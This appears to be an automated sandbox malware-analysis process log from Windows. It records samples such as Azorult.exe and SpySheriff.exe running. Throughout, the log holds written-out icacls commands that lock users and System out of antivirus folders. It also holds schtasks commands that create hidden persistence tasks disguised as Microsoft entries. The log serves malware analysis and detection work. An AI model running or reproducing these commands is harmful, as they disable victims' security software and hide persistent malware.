C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1248
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:4248
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:4556
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:1556
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:1920
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:1316
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:5008
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵PID:5036
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:2112
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:1344
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1264 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:2324
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:2980
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:4064
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:1864
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:2808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵PID:3524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3920
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:1604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3552
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4684 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:1020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4028
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:1332
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3980
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:4584
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:240
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:2416
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:4832
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:4612
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3976
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:4184
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:832
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:2976
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:2008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1644
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:3416
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:1832
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2928
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:2224
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵PID:2976
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:4296
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:4764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3980
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:1616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1832
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:4684
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵PID:1844
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵PID:4456
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:4180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3524
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:532
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:3164
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:2008
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵PID:3132
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4080
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- Scheduled Task/Job: Scheduled Task
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4664
-
-
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:12⤵PID:4296
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
PID:4584
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
PID:4432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:12⤵PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5964 /prefetch:82⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:12⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6724 /prefetch:82⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6308 /prefetch:82⤵PID:4764
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:82⤵PID:2584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:82⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7156 /prefetch:82⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 /prefetch:82⤵PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6348 /prefetch:82⤵PID:2980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:12⤵PID:500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4864 /prefetch:82⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:5788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6260 /prefetch:82⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:82⤵PID:1140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7000 /prefetch:82⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6272 /prefetch:82⤵PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:2124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:1148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3384 /prefetch:82⤵PID:5716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:82⤵PID:4944
-
-
C:\Users\Admin\Downloads\NETFramework.exe"C:\Users\Admin\Downloads\NETFramework.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5200 -
F:\e05835f342617697ed\Setup.exeF:\e05835f342617697ed\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5980
-
-
-
C:\Users\Admin\Downloads\NETFramework.exe"C:\Users\Admin\Downloads\NETFramework.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3948 -
F:\9f32525affc79c0ff620ba5deae4040e\Setup.exeF:\9f32525affc79c0ff620ba5deae4040e\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1156
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:12⤵PID:2788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1012 /prefetch:82⤵PID:2372
-
-
